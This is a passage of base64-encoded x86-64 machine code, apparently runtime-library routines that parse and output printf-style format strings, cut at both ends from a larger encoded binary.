L2UWFwH5FTIsTSYtCCEk5QhB1EkGAehgAdAVB/wHrHkGDCf/rGEH/AUiLA0j/QBBIiwNIiwiIEUiLA0j/AEGDOf90CEH/w0U72Hy7SItcJAjDzEWFwH5oSIlcJAhIiXwkEECK+kiL2UUz20yLE0mLQghJOUIQdRJBgHoYAHQFQf8B6yRBgwn/6x5B/wFIiwNAD77XSP9AEEiLA0iLCGaJEUiLA0iDAAJBgzn/dAhB/8NFO9h8tUiLXCQISIt8JBDDzMxAU0iD7CBIi9kzyUiJC0iJSwhIiUsYSIlLIEiJSxBIiUsoSIlLMIlLOGaJS0CJS1CIS1RIiYtYBAAASImLYAQAAEiLAkiJg2gEAABIi0QkUEiJQwhIi0QkWEiJQyBMiQNMiUsYiYtwBAAA6BkAAQBIiUMQSIvDSIPEIFvDQFNIg+wgSIvZM8lIiQtIiUsISIlLGEiJSyBIiUsQSIlLKEiJSzCJSziIS0BmiUtCiUtQiEtUSImLWAQAAEiJi2AEAABIiwJIiYNoBAAASItEJFBIiUMISItEJFhIiUMgTIkDTIlLGImLcAQAAOia/wAASIlDEEiLw0iDxCBbw8xIiVwkCFdIg+wgxkEYAEiL+UiF0nQFDxAC6xGLBScUBgCFwHUODxAFvMcFAPMPf0EI60/oZAkBAEiJB0iNVwhIi4iQAAAASIkKSIuIiAAAAEiJTxBIi8jo1AoBAEiLD0iNVxDo/AoBAEiLD4uBqAMAAKgCdQ2DyAKJgagDAADGRxgBSIvHSItcJDBIg8QgX8NIiVwkEEiJdCQYV0iB7PAEAABIiwWfxAUASDPESImEJOAEAABIiwFIi9lIizhIi8/o+xgBAEiLUwhIjUwkOECK8EiLEugn////SIsTSI1EJEBIi0sgTItLGEyLAkiNVCQwSIsJTYsJTIlEJDBMi0MQSIlMJChIjUwkYEiJRCQgTYsA6Gn+//9IjUwkYOjnAwAASIuMJMAEAACL2OiQ9gAASIOkJMAEAAAAgHwkUAB0DEiLTCQ4g6GoAwAA/UiL10CKzug5GQEAi8NIi4wk4AQAAEgzzOgX4AEATI2cJPAEAABJi1sYSYtzIEmL41/DzMxIiVwkCFdIg+wgSIvZSIv6D74J6BD9AACD+GV0D0j/ww+2C+iI+gAAhcB18Q++C+j0/AAAg/h4dQRIg8MCSIsHihNIi4j4AAAASIsBigiIC0j/w4oDiBOK0IoDSP/DhMB18UiLXCQwSIPEIF/DzMzMSIvESIlYEEiJaBhWV0FWSIPsIEiLcRBIi/m9AQAAAEiL2kiNUAhEizaDJgBEjUUJSItJGEiDYAgASCvN6OfgAACJA0iLRxCDOCJ0EUiLRCRASDtHGHIGSIlHGOsDQDLtgz4AdQhFhfZ0A0SJNkiLXCRIQIrFSItsJFBIg8QgQV5fXsPMSIvESIlYEEiJaBhIiXAgV0iD7CBIi3EQSIv5SIvaQbgKAAAASI1QCIsugyYASItJGEiDYAgASIPpAujF4AAAiQNIi0cQgzgidBNIi0QkMEg7RxhyCEiJRxiwAesCMsCDPgB1BoXtdAKJLkiLXCQ4SItsJEBIi3QkSEiDxCBfw8xIiVwkCEiJbCQQSIl0JBhXSIPsIDP2SIvZSDmxaAQAAHUY6HH8AADHABYAAADoovgAAIPI/+mvAQAASDlxGHTi/4FwBAAAg7lwBAAAAg+EkwEAAIPP/0iNLW8KAgCJc1CJcyzpSwEAAEj/Qxg5cygPjFMBAACKQ0GLUywsIDxadw9ID75DQQ+2TCjgg+EP6wKLzo0EygPIi8EPtgwpwekEiUssg/kID4RSAQAAhckPhPMAAACD6QEPhNYAAACD6QEPhJgAAACD6QF0Z4PpAXRag+kBdCiD6QF0FoP5AQ+FKwEAAEiLy+h1DgAA6b8AAABIi8vopAkAAOmyAAAAgHtBKnQRSI1TOEiLy+jt/f//6ZsAAABIg0MgCEiLQyCLSPiFyQ9Iz4lLOOswiXM46YEAAACAe0EqdAZIjVM068lIg0MgCEiLQyCLSPiJSzSFyXkJg0swBPfZiUs0sAHrUYpDQTwgdCg8I3QePCt0FDwtdAo8MHU+g0swCOs4g0swBOsyg0swAessg0swIOsmg0swAusgSIlzMECIc0CJeziJczxAiHNU6wxIi8vo4QcAAITAdFtIi0MYigiIS0GEyQ+FpP7//0j/Qxg5cyx0BoN7LAd1K/+DcAQAAIO7cAQAAAIPhXf+//+LQyhIi1wkMEiLbCQ4SIt0JEBIg8QgX8PolfoAAMcAFgAAAOjG9gAAi8fr18zMSIvESIlYCEiJcBBIiXgYTIlwIEFXSIPsIDP2SIvZSDmxaAQAAHUY6Fj6AADHABYAAADoifYAAIPI/+kHAgAASDlxGHTi/4FwBAAAg7lwBAAAAg+E6wEAAIPP/0yNPfYHAgBEjXchiXNQiXMs6aYBAABIg0MYAjlzKA+MsQEAAA+3Q0KLUyxmQSvGZoP4WncPD7dDQkIPtkw44IPhD+sCi86NBMpCD7YEOMHoBIlDLIP4CA+EqQEAAIXAD4QHAQAAg+gBD4TqAAAAg+gBD4SiAAAAg+gBdGuD6AF0XoPoAXQog+gBdBaD+AEPhYIBAABIi8vo0Q4AAOkXAQAASIvL6AAJAADpCgEAAGaDe0IqdBFIjVM4SIvL6FD8///p8gAAAEiDQyAISItDIItI+IXJD0jPiUs46dcAAACJczjp1QAAAGaDe0IqdAZIjVM068VIg0MgCEiLQyCLSPiJSzSFyQ+JqwAAAINLMAT32YlLNOmdAAAAD7dDQkE7xnQwg/gjdCWD+Ct0GoP4LXQPg/gwD4WCAAAAg0swCOt8g0swBOt2g0swAetwRAlzMOtqg0swAutkSIlzMECIc0CJeziJczxAiHNU61BED7dDQsZDVAFIi4NoBAAAi0gUwekM9sEBdA1Ii4NoBAAASDlwCHQfSIuTaAQAAEEPt8joDREBALn//wAAZjvBdQWJeyjrA/9DKLABhMB0WkiLQxgPtwhmiUtCZoXJD4VG/v//SINDGAL/g3AEAACDu3AEAAACD4Uj/v//i0MoSItcJDBIi3QkOEiLfCRATIt0JEhIg8QgQV/D6B74AADHABYAAADoT/QAAIvH69HMzMxIi8RIiVgISIloEEiJcBhIiXggQVZIg+wgM/ZIi9lIObFoBAAAdRjo4PcAAMcAFgAAAOgR9AAAg8j/6RgCAABIOXEYdOL/gXAEAACDuXAEAAACD4T8AQAAg8//TI013gUCAI1vIYlzUIlzLOmtAQAASINDGAI5cygPjLgBAAAPt0NCi1MsZivFZoP4WncPD7dDQkIPtkww4IPhD+sCi86NBMoDyEIPtgwxwekEiUssg/kID4S6AQAAhckPhAgBAACD6QEPhOsAAACD6QEPhKIAAACD6QF0a4PpAXReg+kBdCiD6QF0FoP5AQ+FkwEAAEiLy+glDwAA6R0BAABIi8voLAgAAOkQAQAAZoN7Qip0EUiNUzhIi8vo2Pn//+n4AAAASINDIAhIi0Mgi0j4hckPSM+JSzjp3QAAAIlzOOnbAAAAZoN7Qip0BkiNUzTrxUiDQyAISItDIItI+IlLNIXJD4mxAAAAg0swBPfZiUs06aMAAAAPt0NCO8V0MoP4I3Qog/grdB2D+C10EoP4MA+FiQAAAINLMAjpgAAAAINLMATreoNLMAHrdAlrMOtvg0swAutpSIlzMECIc0CJeziJczxAiHNU61UPt1NCxkNUAUiLi2gEAABIi0EISDlBEHUQQDhxGHQF/0Mo6yuJeyjrJv9DKEiLg2gEAABI/0AQSIuDaAQAAEiLCGaJEUiLg2gEAABIgwACsAGEwHRlSItDGA+3CGaJS0JmhckPhT/+//9Ig0MYAjlzLHQGg3ssB3Ux/4NwBAAAg7twBAAAAg+FEf7//4tDKEiLXCQwSItsJDhIi3QkQEiLfCRISIPEIEFew+iV9QAAxwAWAAAA6MbxAACLx+vRzMxIi8RIiVgISIloEEiJcBhIiXggQVZIg+wgM/ZIi9lIObFoBAAAdRjoWPUAAMcAFgAAAOiJ8QAAg8j/6QsCAABIOXEYdOL/gXAEAACDuXAEAAACD4TvAQAAg8//TI019gICAI1vIYlzUIlzLOmrAQAASINDGAI5cygPjLYBAAAPt0NCi1MsZivFZoP4WncPD7dDQkIPtkww4IPhD+sCi86NBMpCD7YEMMHoBIlDLIP4CA+ErwEAAIXAD4QIAQAAg+gBD4TrAAAAg+gBD4SiAAAAg+gBdGuD6AF0XoPoAXQog+gBdBaD+AEPhYgBAABIi8vonwwAAOkdAQAASIvL6KYFAADpEAEAAGaDe0IqdBFIjVM4SIvL6FL3///p+AAAAEiDQyAISItDIItI+IXJD0jPiUs46d0AAACJczjp2wAAAGaDe0IqdAZIjVM068VIg0MgCEiLQyCLSPiJSzSFyQ+JsQAAAINLMAT32YlLNOmjAAAAD7dDQjvFdDKD+CN0KIP4K3Qdg/gtdBKD+DAPhYkAAACDSzAI6YAAAACDSzAE63qDSzAB63QJazDrb4NLMALraUiJczBAiHNAiXs4iXM8QIhzVOtVD7dTQsZDVAFIi4toBAAASItBCEg5QRB1EEA4cRh0Bf9DKOsriXso6yb/QyhIi4NoBAAASP9AEEiLg2gEAABIiwhmiRFIi4NoBAAASIMAArABhMB0WkiLQxgPtwhmiUtCZoXJD4VB/v//SINDGAL/g3AEAACDu3AEAAACD4Ue/v//i0MoSItcJDBIi2wkOEiLdCRASIt8JEhIg8QgQV7D6BrzAADHABYAAADoS+8AAIvH69HMzMxAU0iD7CAz0kiL2ehkAAAAhMB0SEiLi2gEAABEikNBSItBCEg5QRB1EYB5GAB0Bf9DKOskg0so/+se/0MoSP9BEEiLi2gEAABIixFEiAJIi4toBAAASP8BsAHrEuin8gAAxwAWAAAA6NjuAAAywEiDxCBbw0iD7ChIi0EISIvRRA+2QUHGQVQAuQCAAABIiwBIiwBmQoUMQHRoSIuKaAQAAEiLQQhIOUEQdRGAeRgAdAX/QijrJINKKP/rHv9CKEj/QRBIi4JoBAAASIsIRIgBSIuCaAQAAEj/AEiLQhiKCEj/wIhKQUiJQhiEyXUU6BXyAADHABYAAADoRu4AADLA6wKwAUiDxCjDzMzMSIPsKIpBQTxGdRn2AQgPhWABAADHQSwHAAAASIPEKOmgBAAAPE51J/YBCA+FQwEAAMdBLAgAAADov/EAAMcAFgAAAOjw7QAAMsDpJwEAAIN5PAB14zxJD4S6AAAAPEwPhKkAAAA8VA+EmAAAADxodHI8anRiPGx0Njx0dCY8d3QWPHqwAQ+F6wAAAMdBPAYAAADp3wAAAMdBPAwAAADp0QAAAMdBPAcAAADpxQAAAEiLQRiAOGx1E0j/wMdBPAQAAABIiUEY6akAAADHQTwDAAAA6Z0AAADHQTwFAAAA6ZEAAABIi0EYgDhodRBI/8DHQTwBAAAASIlBGOt4x0E8AgAAAOtvx0E8DQAAAOtmx0E8CAAAAOtdSItRGIoCPDN1F4B6ATJ1EUiNQgLHQTwKAAAASIlBGOs8PDZ1F4B6ATR1EUiNQgLHQTwLAAAASIlBGOshLFg8IHcbSA++wEi6ARCCIAEAAABID6PCcwfHQTwJAAAAsAFIg8Qow8xIg+woZoN5QkZ1GfYBCA+FhwEAAMdBLAcAAABIg8Qo6aAFAABmg3lCTnUn9gEID4VnAQAAx0EsCAAAAOhA8AAAxwAWAAAA6HHsAAAywOlLAQAAg3k8AHXjD7dBQoP4SQ+EzwAAAIP4TA+EvQAAAIP4VA+EqwAAALpoAAAAO8J0fIP4anRrumwAAAA7wnQ5g/h0dCiD+Hd0F4P4erABD4X6AAAAx0E8BgAAAOnuAAAAx0E8DAAAAOngAAAAx0E8BwAAAOnUAAAASItBGGY5EHUUSIPAAsdBPAQAAABIiUEY6bcAAADHQTwDAAAA6asAAADHQTwFAAAA6Z8AAABIi0EYZjkQdRRIg8ACx0E8AQAAAEiJQRjpggAAAMdBPAIAAADrecdBPA0AAADrcMdBPAgAAADrZ0iLURgPtwJmg/gzdRhmg3oCMnURSI1CBMdBPAoAAABIiUEY60Jmg/g2dRhmg3oCNHURSI1CBMdBPAsAAABIiUEY6yRmg+hYZoP4IHcaD7fASLoBEIIgAQAAAEgPo8JzB8dBPAkAAACwAUiDxCjDzMxIg+woZoN5QkZ1GfYBCA+FhwEAAMdBLAcAAABIg8Qo6cgGAABmg3lCTnUn9gEID4VnAQAAx0EsCAAAAOic7gAAxwAWAAAA6M3qAAAywOlLAQAAg3k8AHXjD7dBQoP4SQ+EzwAAAIP4TA+EvQAAAIP4VA+EqwAAALpoAAAAO8J0fIP4anRrumwAAAA7wnQ5g/h0dCiD+Hd0F4P4erABD4X6AAAAx0E8BgAAAOnuAAAAx0E8DAAAAOngAAAAx0E8BwAAAOnUAAAASItBGGY5EHUUSIPAAsdBPAQAAABIiUEY6bcAAADHQTwDAAAA6asAAADHQTwFAAAA6Z8AAABIi0EYZjkQdRRIg8ACx0E8AQAAAEiJQRjpggAAAMdBPAIAAADrecdBPA0AAADrcMdBPAgAAADrZ0iLURgPtwJmg/gzdRhmg3oCMnURSI1CBMdBPAoAAABIiUEY60Jmg/g2dRhmg3oCNHURSI1CBMdBPAsAAABIiUEY6yRmg+hYZoP4IHcaD7fASLoBEIIgAQAAAEgPo8JzB8dBPAkAAACwAUiDxCjDzMxIiVwkEEiJbCQYSIl0JCBXQVZBV0iD7DAPvkFBSIvZQb8BAAAAg/hkf10PhMgAAACD+EEPhNIAAACD+EN0M4P4RA+OzQAAAIP4Rw+OuwAAAIP4U3Rfg/hYdG+D+Fp0HoP4YQ+EowAAAIP4Yw+FowAAADPS6PwMAADpkwAAAOiSBwAA6YkAAACD+Gd+f4P4aXRng/hudFuD+G90OIP4cHQbg/hzdA+D+HV0UoP4eHVljVCY603okxAAAOtVx0E4EAAAAMdBPAsAAABFise6EAAAAOsxi0kwi8HB6AVBhMd0Bw+66QeJSzC6CAAAAEiLy+sQ6HoPAADrGINJMBC6CgAAAEUzwOjHDQAA6wXoBAgAAITAdQcywOlFAQAAgHtAAA+FOAEAAItTMDPAZolEJFAz/4hEJFKLwsHoBEGEx3Qui8LB6AZBhMd0B8ZEJFAt6xpBhNd0B8ZEJFAr6w6LwtHoQYTHdAjGRCRQIEmL/4pLQY1BqKjfdQ+LwsHoBUGEx3QFRYrH6wNFMsCNQb+o3w+UwEWEwHUEhMB0KsZEPFAwSQP/gPlYdAmA+UF0BDLA6wNBisf22BrAJOAEYQQXiEQ8UEkD/4tzNCtzUCv39sIMdRVMjUsoRIvGSI2LaAQAALIg6P7p//9Ii0MQSI1rKEyNs2gEAABIiUQkIEyLzUiNVCRQSYvORIvH6FcUAACLSzCLwcHoA0GEx3QYwekCQYTPdRBMi81Ei8ayMEmLzuiy6f//M9JIi8voaBAAAIN9AAB8G4tDMMHoAkGEx3QQTIvNRIvGsiBJi87oh+n//0GKx0iLXCRYSItsJGBIi3QkaEiDxDBBX0FeX8PMzMxIiVwkEEiJbCQYSIl0JCBXQVRBVUFWQVdIg+xASIsFVbAFAEgzxEiJRCQ4D7dBQr5YAAAASIvZjW7pRI1+qYP4ZH9bD4TGAAAAO8UPhNEAAACD+EN0MoP4RA+OzAAAAIP4Rw+OugAAAIP4U3ReO8Z0b4P4WnQeg/hhD4SjAAAAg/hjD4WjAAAAM9LoHQsAAOmTAAAA6H8FAADpiQAAAIP4Z35/g/hpdGeD+G50W4P4b3Q4g/hwdBuD+HN0D4P4dXRSg/h4dWWNUJjrTeiQDgAA61XHQTgQAAAAx0E8CwAAAEWKx7oQAAAA6zGLSTCLwcHoBUGEx3QHD7rpB4lLMLoIAAAASIvL6xDo5wwAAOsYg0kwELoKAAAARTPA6DQLAADrBeiNBwAAhMB1BzLA6WwBAACAe0AAD4VfAQAAi1MwM8CJRCQwM/9miUQkNIvCwegERI1vIEGEx3Qyi8LB6AZBhMd0Co1HLWaJRCQw6xtBhNd0B7grAAAA6+2LwtHoQYTHdAlmRIlsJDBJi/8Pt0tCQbnf/wAAD7fBZivGZkGFwXUPi8LB6AVBhMd0BUWKx+sDRTLAD7fBQbwwAAAAZivFZkGFwQ+UwEWEwHUEhMB0L2ZEiWR8MEkD/2Y7znQJZjvNdAQywOsDQYrH9tgawCTgBGEEFw++wGaJRHwwSQP/i3M0K3NQK/f2wgx1FkyNSyhEi8ZIjYtoBAAAQYrV6Lbm//9Ii0MQSI1rKEyNs2gEAABIiUQkIEyLzUiNVCQwSYvORIvH6JMQAACLSzCLwcHoA0GEx3QZwekCQYTPdRFMi81Ei8ZBitRJi87oaeb//zPSSIvL6IcOAACDfQAAfByLQzDB6AJBhMd0EUyLzUSLxkGK1UmLzug95v//QYrHSItMJDhIM8zoBcoBAEyNXCRASYtbOEmLa0BJi3NISYvjQV9BXkFdQVxfw8zMzEiJXCQQSIlsJBhIiXQkIFdBVEFVQVZBV0iD7EBIiwWJrQUASDPESIlEJDgPt0FCvlgAAABIi9mNbulEjX6pg/hkf1sPhMYAAAA7xQ+E0QAAAIP4Q3Qyg/hED47MAAAAg/hHD466AAAAg/hTdF47xnRvg/hadB6D+GEPhKMAAACD+GMPhaMAAAAz0uhRCAAA6ZMAAADoswIAAOmJAAAAg/hnfn+D+Gl0Z4P4bnRbg/hvdDiD+HB0G4P4c3QPg/h1dFKD+Hh1ZY1QmOtN6MQLAADrVcdBOBAAAADHQTwLAAAARYrHuhAAAADrMYtJMIvBwegFQYTHdAcPuukHiUswuggAAABIi8vrEOgbCgAA6xiDSTAQugoAAABFM8DoaAgAAOsF6MEEAACEwHUHMsDpbAEAAIB7QAAPhV8BAACLUzAzwIlEJDAz/2aJRCQ0i8LB6AREjW8gQYTHdDKLwsHoBkGEx3QKjUctZolEJDDrG0GE13QHuCsAAADr7YvC0ehBhMd0CWZEiWwkMEmL/w+3S0JBud//AAAPt8FmK8ZmQYXBdQ+LwsHoBUGEx3QFRYrH6wNFMsAPt8FBvDAAAABmK8VmQYXBD5TARYTAdQSEwHQvZkSJZHwwSQP/ZjvOdAlmO810BDLA6wNBisf22BrAJOAEYQQXD77AZolEfDBJA/+LczQrc1Ar9/bCDHUWTI1LKESLxkiNi2gEAABBitXo1uT//0iLQxBIjWsoTI2zaAQAAEiJRCQgTIvNSI1UJDBJi85Ei8fojw8AAItLMIvBwegDQYTHdBnB6QJBhM91EUyLzUSLxkGK1EmLzuiJ5P//M9JIi8vopwwAAIN9AAB8HItDMMHoAkGEx3QRTIvNRIvGQYrVSYvO6F3k//9BisdIi0wkOEgzzOg5xwEATI1cJEBJi1s4SYtrQEmLc0hJi+NBX0FeQV1BXF/DzMzMSIlcJAhIiXQkEFdIg+wgSINBIAhIi9lIi0EgSIt4+EiF/3QzSIt3CEiF9nQqRItBPIpRQUiLCehY4f//hMBIiXNID7cHdAvR6IlDUMZDVAHrG4lDUOsSSI0NVvMBAMdDUAYAAABIiUtIxkNUAEiLXCQwsAFIi3QkOEiDxCBfw8xIiVwkCEiJdCQQV0iD7CBIg0EgCEiL2UiLQSBIi3j4SIX/dDRIi3cISIX2dCtEi0E8D7dRQkiLCegH4f//hMBIiXNID7cHdAvR6IlDUMZDVAHrG4lDUOsSSI0N1fIBAMdDUAYAAABIiUtIxkNUAEiLXCQwsAFIi3QkOEiDxCBfw0iJXCQQV0iD7FCDSTAQSIvZi0E4hcB5FopBQSxBJN/22BvAg+D5g8ANiUE46xJ1EIpBQSxHqN91B8dBOAEAAACLQThIjXlYBV0BAABIi89IY9Dokd///0G4AAIAAITAdSFIg78IBAAAAHUFQYvA6wpIi4cABAAASNHoBaP+//+JQzhIi4cIBAAASIXASA9Ex0iJQ0gzwEiDQyAISIO/CAQAAABIiUQkYEiLQyDyDxBA+PIPEUQkYHUFTYvI6wpMi48ABAAASdHpSIuPCAQAAEiFyXUJTI2XAAIAAOsNTIuXAAQAAEnR6kwD0UiD+QB0CkyLhwAEAABJ0ehIi0MISIvRSIlEJEBIhclIiwMPvktBSA9E10iJRCQ4i0M4iUQkMIlMJChIjUwkYEyJTCQgTYvK6DL5AACLQzDB6AWoAXQTg3s4AHUNSItTCEiLS0joxeT//4pDQSxHqN91bYtDMMHoBagBdWNIi0MISItTSEiLCEiLgfgAAABIiwhEigHrCEE6wHQJSP/CigKEwHXyigJI/8KEwHQy6wksRajfdAlI/8KKAoTAdfFIi8pI/8qAOjB0+EQ4AnUDSP/KigFI/8JI/8GIAoTAdfJIi0NIgDgtdQuDSzBASP/ASIlDSEiLU0iKAixJPCV3FEi5IQAAACEAAABID6PBcwTGQ0FzSIPJ/0j/wYA8CgB194lLULABSItcJGhIg8RQX8PMzEiJXCQQSIl8JBhBVkiD7FCDSTAQSIvZi0E4Qb7f/wAAhcB5HA+3QUJmg+hBZkEjxmb32BvAg+D5g8ANiUE46xd1FQ+3QUJmg+hHZkGFxnUHx0E4AQAAAItBOEiNeVgFXQEAAEiLz0hj0Ohe3f//QbgAAgAAhMB1IUiDvwgEAAAAdQVBi8DrCkiLhwAEAABI0egFo/7//4lDOEiLhwgEAABIhcBID0THSIlDSDPASINDIAhIg78IBAAAAEiJRCRgSItDIPIPEED48g8RRCRgdQVNi8jrCkyLjwAEAABJ0elIi48IBAAASIXJdQlMjZcAAgAA6w1Mi5cABAAASdHqTAPRSIP5AHQKTIuHAAQAAEnR6EiLQwhIi9FIiUQkQEiFyUiLAw++S0JID0TXSIlEJDiLQziJRCQwiUwkKEiNTCRgTIlMJCBNi8ro//YAAItDMMHoBagBdBODezgAdQ1Ii1MISItLSOiS4v//D7dDQmaD6EdmQYXGdW2LQzDB6AWoAXVjSItDCEiLU0hIiwhIi4H4AAAASIsIRIoB6whBOsB0CUj/wooChMB18ooCSP/ChMB0MusJLEWo33QJSP/CigKEwHXxSIvKSP/KgDowdPhEOAJ1A0j/yooBSP/CSP/BiAKEwHXySItDSIA4LXULg0swQEj/wEiJQ0hIi1NIigIsSTwldxlIuSEAAAAhAAAASA+jwXMJuHMAAABmiUNCSIPJ/0j/wYA8CgB190iLfCRwsAGJS1BIi1wkaEiDxFBBXsPMzMxIiVwkCFdIg+wgRItBPEiL2YpRQUiLCegY3P//SI17WITAdEtIg0MgCEiDvwgEAAAASItDIHUIQbgAAgAA6wpMi4cABAAASdHoSIuXCAQAAEiNS1BED7dI+EiF0kgPRNfoU+IAAIXAdCrGQ0AB6yRMi4cIBAAATYXATA9Ex0iDQyAISItLIIpR+EGIEMdDUAEAAABIi48IBAAAsAFIhclID0TPSIlLSEiLXCQwSIPEIF/DzMxIiVwkEEiJdCQYV0iD7CDGQVQBSIvZSINBIAhIi0EgRItBPA+3UUJIiwkPt3D46H3b//9IjXtYSIuPCAQAAITAdS9Mi0sISI1UJDBAiHQkMEiFyYhEJDFID0TPSYsBTGNACOjJ3gAAhcB5EMZDQAHrCkiFyUgPRM9miTFIi48IBAAAsAFIi3QkQEiFycdDUAEAAABID0TPSIlLSEiLXCQ4SIPEIF/DzMxAU0iD7CBBuwgAAABIi9mLSTxFishEi9JFjUP8g/kFf2V0GIXJdEyD6QF0U4PpAXRHg+kBdD2D+QF1XEmL00iLwkiD6AEPhKIAAABIg+gBdH1Ig+gCdFpJO8B0P+gH3gAAxwAWAAAA6DjaAAAywOkmAQAASYvQ68a6AgAAAOu/ugEAAADruIPpBnSwg+kBdKuD6QJ0puuaM9Lro4tDMEwBWyDB6ASoAUiLQyBIi0j461mLQzBMAVsgwegEqAFIi0MgdAZIY0j460GLSPjrPItDMEwBWyDB6ASoAUiLQyB0B0gPv0j46yMPt0j46x2LQzBMAVsgwegEqAFIi0MgdAdID75I+OsED7ZI+ESLQzBBi8DB6ASoAXQQSIXJeQtI99lBg8hARIlDMIN7OAB9CcdDOAEAAADrEYNjMPe4AAIAADlDOH4DiUM4SIXJdQSDYzDfRYvCSTvTdQ1Ii9FIi8vohNr//+sKi9FIi8vo3Nn//4tDMMHoB6gBdB2De1AAdAlIi0tIgDkwdA5I/0tISItLSMYBMP9DULABSIPEIFvDzEiJXCQISIl0JBBXSIPsILsIAAAASIv5SAFZIEiLQSBIi3D46Lz2AACFwHUX6JfcAADHABYAAADoyNgAADLA6YgAAACLTzy6BAAAAIP5BX8sdD6FyXQ3g+kBdBqD6QF0DoPpAXQog/kBdCYz2+siuwIAAADrG7sBAAAA6xSD6QZ0D4PpAXQKg+kCdAXr00iL2kiD6wF0KkiD6wF0G0iD6wJ0Dkg72nWFSGNHKEiJBusVi0coiQbrDg+3RyhmiQbrBYpPKIgOxkdAAbABSItcJDBIi3QkOEiDxCBfw8xIiVwkCEiJdCQQV0iD7CBIg0EgCEiL2UiLQSCLcTiD/v9Ei0E8ilFBSIt4+Lj///9/SIl5SA9E8EiLCegc2P//SGPWhMB0HUiF/8ZDVAFIjQ1j/QMASA9Fz0iJS0jo7t8AAOsXSIX/SI0NDuoBAEgPRc9IiUtI6HneAABIi3QkOIlDULABSItcJDBIg8QgX8NIiVwkCEiJdCQQV0iD7CBIg0EgCEiL2UiLQSCLeTiD//9Ei0E8D7dRQkiLcPi4////f0iJcUgPRPhIiwnou9f//4TAdCNIhfZIY9dIjQ3W/AMAxkNUAUgPRc5IiUtI6F3fAACJQ1DrTEiF9nULSI0FeOkBAEiJQ0hMi0NIRTPJhf9+LUGAOAB0J0iLQwhBD7YQSIsISIsBuQCAAABmhQxQdANJ/8BJ/8BB/8FEO89800SJS1BIi1wkMLABSIt0JDhIg8QgX8PMzEiJXCQQSIl0JBhXSIPsUEiLBTqgBQBIM8RIiUQkQIB5VABIi9l0botBUIXAfmdIi3FIM/+FwHR+RA+3DkiNVCQ0g2QkMABIjUwkMEG4BgAAAEiNdgLoLt0AAIXAdTFEi0QkMEWFwHQnSItDEEyNSyhIjYtoBAAASIlEJCBIjVQkNOg6AwAA/8c7e1B1q+sng0so/+shSItDEEyNSShEi0NQSIHBaAQAAEiLU0hIiUQkIOgKAwAAsAFIi0wkQEgzzOjDuwEASItcJGhIi3QkcEiDxFBfw8zMzEiJXCQQSIlsJBhWV0FWSIPsMEUz9kiL2UQ4cVQPhZQAAACLQVCFwA+OiQAAAEiLcUhBi/5Mi0sISI1MJFBmRIl0JFBIi9ZJiwFMY0AI6IrZAABIY+iFwH5XSIuDaAQAAEQPt0QkUItIFMHpDPbBAXQNSIuDaAQAAEw5cAh0IEiLk2gEAABBD7fI6LbxAAC5//8AAGY7wXUGg0so/+sD/0MoSAP1/8dIi8U7e1B1husng0so/+shSItDEEyNSShEi0NQSIHBaAQAAEiLU0hIiUQkIOgFAQAASItcJFiwAUiLbCRgSIPEMEFeX17DSIlcJBBIiWwkGEiJdCQgV0iD7DAz7UiL2UA4aVQPhZIAAACLQVCFwA+OhwAAAEiLcUiL/UyLSwhIjUwkQGaJbCRASIvWSYsBTGNACOif2AAASGPQhcB+V0iLi2gEAABED7dEJEBIi0EISDlBEHURQDhpGHQF/0Mo6yaDSyj/6yD/QyhI/0EQSIuDaAQAAEiLCGZEiQFIi4NoBAAASIMAAkgD8v/HSIvCO3tQdYfrJ4NLKP/rIUiLQxBMjUkoRItDUEiBwWgEAABIi1NISIlEJCDo4gEAAEiLXCRIsAFIi2wkUEiLdCRYSIPEMF/DzMzMSIlcJBBIiWwkGEiJdCQgV0FWQVdIg+wgSIsBSYvZTIvySIvxRItQFEHB6gxB9sIBdBJIiwFIg3gIAHUIRQEB6awAAABIi3wkYEljwIsvgycATI08QolsJEBJO9cPhIMAAAC9//8AAEiLBkUPtwaLSBTB6Qz2wQF0CkiLBkiDeAgAdBZIixZBD7fI6NnvAABmO8V1BYML/+sJ/wOLA4P4/3U2gz8qdTpIiwaLSBTB6Qz2wQF0CkiLBkiDeAgAdBdIixa5PwAAAOic7wAAZjvFdQWDC//rAv8DSYPGAk0793WGi2wkQIM/AHUGhe10AokvSItcJEhIi2wkUEiLdCRYSIPEIEFfQV5fw8zMzEiLxEiJWAhIiWgQSIlwGEiJeCBBVEFWQVdIg+wgSIt8JGBMi/lJi9lJY+hEizeDJwBIiwlIi0EISDlBEHURgHkYAHQFQQEp60VBgwn/6z9IK0EQSIv1SIsJSDvFSA9C8EyLxuggv///SYsHSAEwSYsHSAFwEEmLB4B4GAB0BAEr6wxIO/V0BYML/+sCATODPwB1CEWF9nQDRIk3SItcJEBIi2wkSEiLdCRQSIt8JFhIg8QgQV9BXkFcw8zMSIlcJAhIiWwkEEiJdCQYV0FUQVVBVkFXSIPsIEiLdCRwTIvhSYv5SWPoRIs+gyYASIsJSItBCEg5QRB1EYB5GAB0BUEBKetNQYMJ/+tHSCtBEEyL9UiLCUg7xUwPQvBLjRw2TIvD6GG+//9JiwQkSAEYSYsEJEwBcBBJiwQkgHgYAHQEAS/rDUw79XQFgw//6wNEATeDPgB1CEWF/3QDRIk+SItcJFBIi2wkWEiLdCRgSIPEIEFfQV5BXUFcX8PMQFVIi+xIg+xgSItFMEiJRcBMiU0YTIlFKEiJVRBIiU0gSIXSdRXoLdUAAMcAFgAAAOhe0QAAg8j/60pNhcB05kiNRRBIiVXISIlF2EyNTchIjUUYSIlV0EiJReBMjUXYSI1FIEiJRehIjVXQSI1FKEiJRfBIjU0wSI1FwEiJRfjo+8z//0iDxGBdw8xAU0iD7DBIi9pNhcl0PEiF0nQ3TYXAdDJIi0QkaEiJRCQoSItEJGBIiUQkIOgDzf//hcB5A8YDAIP4/nUg6IrUAADHACIAAADrC+h91AAAxwAWAAAA6K7QAACDyP9Ig8QwW8PMSIlcJAhIiXQkIFVXQVRBVkFXSI2sJPD7//9IgewQBQAASIsF/JkFAEgzxEiJhQAEAABFM+RJi9lJi/hIi/JMi/lNhcl1GOgd1AAAxwAWAAAA6E7QAACDy//prAEAAE2FwHQFSIXSdN5Ii5VgBAAASI1MJDDoY9T//zPSSI1MJFBEjUIg6JPD//9Ni/dIiXQkUEiJfCRYTIlkJGBBg+YCdQpEiGQkaEiF9nUFxkQkaAFIjUQkUEyLy0iJRCRwSI1UJHBIi4VoBAAASI1NgEiJRCQoTYvHSI1EJDhIiUQkIOh40///SI1NgOj33f//SGPYSIX2dS9Ii43gAwAA6JvLAABMiaXgAwAARDhkJEgPhPcAAABIi0QkMIOgqAMAAP3p5gAAAEH2xwF0TUiF/3UzhcB0L0iL